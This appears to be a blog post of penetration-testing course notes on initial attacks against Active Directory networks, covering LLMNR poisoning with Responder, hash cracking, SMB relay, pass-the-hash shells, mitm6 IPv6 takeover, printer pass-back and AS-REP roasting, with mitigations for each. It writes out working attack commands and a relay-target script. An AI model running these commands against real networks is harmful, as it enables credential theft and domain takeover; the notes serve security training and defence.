PEH notes - Active Directory 2

Attacking Active Directory: Initial Attack Vectors#

LLMNR Poisoning#

LLMNR: Link-Local Multicast Name Resolution (the successor of NBT-NS, the NetBIOS Name Service, which Windows still falls back to after LLMNR)

⁉️ Used to identify hosts when DNS fails to do so ⁉️

Is it bad? YEAH. The key flaw is that any host on the local segment can answer a broadcast/multicast name query, and the victim then authenticates to whoever answered, handing over its username and an NTLMv2 challenge/response (what Responder prints as the "NTLMv2-SSP hash").

—> MITM attack: we poison the name resolution, the victim connects to us, and we capture the challenge/response to crack it offline (or relay it, see SMB Relay below)

Steps of the attack (How?)#

  1. Run Responder

    sudo responder -I <net_interface> -dwP -v

    This tool is going to “respond” to LLMNR/NBT-NS/mDNS queries and capture the authentication that follows (which protocols it answers and which rogue servers it starts depend on the configuration file, /etc/responder/Responder.conf)

  2. An event occurs on the victim machine (a mistyped share name, a stale DNS record, a script pointing at a decommissioned host: anything that makes name resolution fail and fall back to LLMNR/NBT-NS)

  3. Get the user’s username and NTLMv2 challenge/response

  4. Crack the hash

    hashcat -m 5600 <hash_file> <wordlist_path>

Responder#

sudo responder -I <net_interface> -dwP -v
  • -I: network interface
  • -dwP: -d answers DHCP broadcast requests (and injects a WPAD server in the DHCP reply, so it touches every client on the segment), -w starts the rogue WPAD proxy server, -P forces NTLM authentication on that proxy
  • -v: verbose

After some traffic and fake events, we get a response:

We now have the NTLMv2-SSP Username and the NTLMv2-SSP Hash (Responder also writes each capture as one line in its logs directory, already in the format hashcat expects). Now go crack it with hashcat.

Hashcat#

# Get the cracking mode (-m)
# NTLMv2 = 5600
hashcat --help | grep NTLM
hashcat -m 5600 hash.txt /opt/rockyou.txt
  • -m: cracking mode

When it comes to the real world, rockyou.txt is not enough ⚠️ You need to personalise your password wordlist with specifics about the location or the company (name, city, year, season). We also need to use rules (https://github.com/NotSoSecure/password_cracking_rules). Overall, it will be far more efficient.

Mitigations#

  1. Disable LLMNR and NBT-NS
  2. If it’s not possible,
    1. Require Network Access Control
    2. Require strong user passwords

SMB Relay#

Instead of cracking hashes gathered with Responder, we can relay the NTLM authentication, as it happens, to specific machines and potentially gain access through SMB. (It is the live challenge/response that is relayed, not a previously captured hash, so Responder must not answer the SMB/HTTP request itself, see the configuration step below.)

Requirements:

  • SMB Signing must be disabled or not enforced on the target
  • The relayed user must be a local admin on the target machine for any real value
  • The target must be a different host than the one the authentication came from (relaying back to the origin host has been patched since MS08-068)

Steps of the attack (How?)#

  1. Identify hosts without SMB Signing

    nmap --script=smb2-security-mode.nse -p445 <victim_ip> [-Pn]

    We are looking for hosts whose result reads “Message signing enabled but not required” (or signing disabled). Hosts that report “enabled and required” cannot be relayed to; put the relayable IPs, one per line, in the targets file used below.

  2. Modify the Responder configuration file & run it

    /etc/responder/Responder.conf: set SMB = Off and HTTP = Off, because we don’t want Responder to answer (and capture) these requests itself but to leave them to ntlmrelayx for relaying

    sudo responder -I <net_interface> -dwP -v
  3. Set up the relay with ntlmrelayx.py

    ntlmrelayx.py -tf <targets_file> -smb2support
  4. An event occurs (from the victim machine)

  5. Win (by default ntlmrelayx dumps the local SAM hashes of the target) 🔥

  6. Other wins

    1. Get an interactive shell (by adding the option -i to the ntlmrelayx.py command)

      ntlmrelayx then starts an SMB client shell bound to a local TCP port (printed in its output, 127.0.0.1:11000 by default); just use nc to connect to that port

    2. Run a command (by adding the option -c <command> to the ntlmrelayx.py command)
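For step 1 of the relay procedure, here is an added example (my code, not the original notes' nor nmap's or impacket's) that turns the output of `nmap --script=smb2-security-mode.nse -p445` into the targets file `ntlmrelayx.py -tf` reads. The scan output is constructed for illustration (hosts, latencies and the exact wording of the "disabled" line are assumptions; the "enabled and required" / "enabled but not required" strings are the ones the nmap script prints), and `HOST_RE`, `relay_targets` and `write_targets` are names I chose. The rule it applies is the one from the text: only hosts whose signing is not required are relayable.

```python
# Added example (not from the original notes or nmap/impacket code): build the
# targets file for `ntlmrelayx.py -tf` from the output of
# `nmap --script=smb2-security-mode.nse -p445 <hosts>`.
import re

# "Nmap scan report for 10.0.0.5" or "Nmap scan report for host.corp.local (10.0.0.5)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?")


def relay_targets(nmap_output: str, exclude=()):
    """Return the IPv4 hosts whose SMB signing is not required, i.e. relayable.
    `exclude` is for hosts you never want to relay to (and remember that the
    machine an authentication came from cannot be relayed back to itself)."""
    targets, current = [], None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            continue
        if current and "Message signing" in line:
            # "enabled and required" is the only safe state; anything else is relayable.
            required = "required" in line and "not required" not in line
            if not required and current not in exclude and current not in targets:
                targets.append(current)
    return targets


def write_targets(nmap_output: str, path: str, exclude=()):
    """Write one IP per line, the format ntlmrelayx.py -tf expects; returns the list."""
    targets = relay_targets(nmap_output, exclude)
    with open(path, "w") as fh:
        fh.write("".join(ip + "\n" for ip in targets))
    return targets


# Constructed scan output (made-up hosts), mimicking nmap's normal output format.
SAMPLE_NMAP = """\
Nmap scan report for dc01.corp.local (10.10.10.5)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.10.21
Host is up (0.0030s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.22
Host is up (0.0025s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing is disabled!

Nmap scan report for 10.10.10.30
Host is up (0.0040s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds
"""

if __name__ == "__main__":
    # Typical use: nmap ... -oN scan.txt; then relay_targets(open("scan.txt").read())
    print("\n".join(relay_targets(SAMPLE_NMAP)))
```

Hosts with port 445 closed or with signing required never reach the list, and the domain controller (which enforces signing by default) is correctly left out; pass `exclude` for the victim workstation whose authentication you expect to relay.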

Mitigations#

  • Enable SMB Signing on all devices
  • Disable NTLM authentication on the network (move to Kerberos)
  • Account tiering
  • Local admin restriction

Gaining Shell Access#

Using psexec/wmiexec/smbexec#

  1. With the password:

    psexec.py <domain>/<user>:'<password>'@<IP>
  2. With the hash directly (pass-the-hash). Always pass the whole LM:NT pair (if the LM half is unknown, use the blank LM hash aad3b435b51404eeaad3b435b51404ee), and leave out the domain when it is a local account, e.g. one dumped from the SAM by the relay above:

    psexec.py <user>@<IP> -hashes <LM:NT>

IPv6 Attacks#

Overview#

Every Windows machine has IPv6 enabled, but most networks never configured it, so there is no legitimate DHCPv6 or IPv6 DNS server on the segment. Windows prefers IPv6 over IPv4 and will take the first DHCPv6 server that answers, which is where we can try some attacks.

⚠️ 5 to 10 min max during this attack ⚠️

DNS Takeover via mitm6#

  1. Run ntlmrelayx.py (it relays the incoming authentication to LDAPS on the DC, serves a fake WPAD file and writes its loot to the output folder):

    ntlmrelayx.py -6 -t ldaps://<IP> -wh fakewpad.<domain> -l <output_folder_name>
  2. Run mitm6 (it can heavily impact the network: it answers DHCPv6 for every Windows host on the segment and becomes their DNS server. Don’t let it run for a long time ⚠️):

    sudo mitm6 -i <interface> -d <domain>
  3. Wait for an event to occur (simply a reboot, a login, etc.)

  4. The event is relayed to the domain controller (what we get depends on the user who triggered it)

  5. Check inside <output_folder_name>:

    We can get a lot of information (domain_computers, domain_groups, domain_users, etc.), dumped from LDAP with the relayed user’s rights

  6. If the relayed user is privileged (e.g. an admin logging in), ntlmrelayx creates a new domain user and grants it the replication rights needed for DCSync, so we can later dump the domain hashes with secretsdump.py

Mitigations#

  • Disable IPv6 (not the preferred option)
  • Block DHCPv6 traffic and incoming router advertisements with host firewall rules, so mitm6 cannot hand out addresses or a DNS server
  • Disable WPAD with GPO & the WinHttpAutoProxySvc service
  • Enable LDAP Signing & LDAP channel binding

Pass-back Attacks#

IoT / printer attacks

Many printers and appliances store LDAP / SMB credentials (for address book lookups or scan-to-share). Change the server address in the device’s web interface to our machine, trigger a lookup, and the device authenticates to us: we grab the creds in clear text ⚠️

https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/

Initial Internal Attack Strategy#

Other tools#

  • kerbrute: brute-force user enumeration against Kerberos, which does not lock accounts or leave classic logon failures (you need to know the username format, e.g. first.last)

  • enum4linux

  • ldapsearch

  • rpcclient

  • crackmapexec to enumerate users by brute forcing RIDs

    crackmapexec smb <IP> -u 'guest' -p '' --rid-brute
  • AS-REP roasting (the command below, GetNPUsers.py, is not Kerberoasting): it works without a password against accounts that have Kerberos pre-authentication disabled, and as a side effect it confirms which usernames exist. We can also perform password spraying once we have a user list

    GetNPUsers.py <domain>/ -usersfile <users_file> -no-pass -dc-ip <dc_ip>

    🔥 Use the command below to synchronise your clock with the DC and avoid the KRB_AP_ERR_SKEW error (Kerberos tolerates 5 minutes of skew by default)

    faketime "$(rdate -n $DC_IP -p | awk '{print $2, $3, $4}' | date -f - "+%Y-%m-%d %H:%M:%S")" zsh
https://fzfstormz.github.io/posts/peh-notes/peh-notes---active-directory-2/
Author
Meitoka
Published at
2024-12-14